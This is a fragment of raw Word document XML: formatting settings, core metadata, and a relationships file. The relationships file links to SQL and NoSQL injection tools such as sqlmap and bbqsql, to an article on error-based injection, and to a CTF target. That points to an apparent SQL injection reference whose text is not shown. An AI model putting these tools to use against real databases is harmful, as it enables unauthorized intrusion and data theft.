            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2042700932">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1626345948">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="807942706">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="712585042">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2093119761">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="619065968">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="469397877">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1289970262">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="109015362">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="219826322">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="709034747">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1867526080">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1906917848">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="404188390">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1631472706">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="623389106">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="803078848">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2042047480">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1380203745">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="505678462">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="190268228">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="715202374">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="152740311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jarvisoj.com:32772/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kitploit.com/2017/05/whitewidow-sql-vulnerability-scanner.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/JohnTroony/Blisqy" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ferruh.mavituna.com/fast-way-to-extract-data-from-error-based-sql-injections-oku/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/codingo/NoSQLMap" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/leviathan-framework/leviathan" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/awnumar/blind-sql-bitshif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2.microsoft.com/en-us/library/ms190312.aspx" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Neohapsis/bbqsql" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dtag-dev-sec/explo" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ron190/jsql-inje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qlmapproject/sqlmap" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/stamparm/DS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74</Pages>
  <Words>13603</Words>
  <Characters>77540</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Cooper</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rob Cooper</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-20T18:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-20T18:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>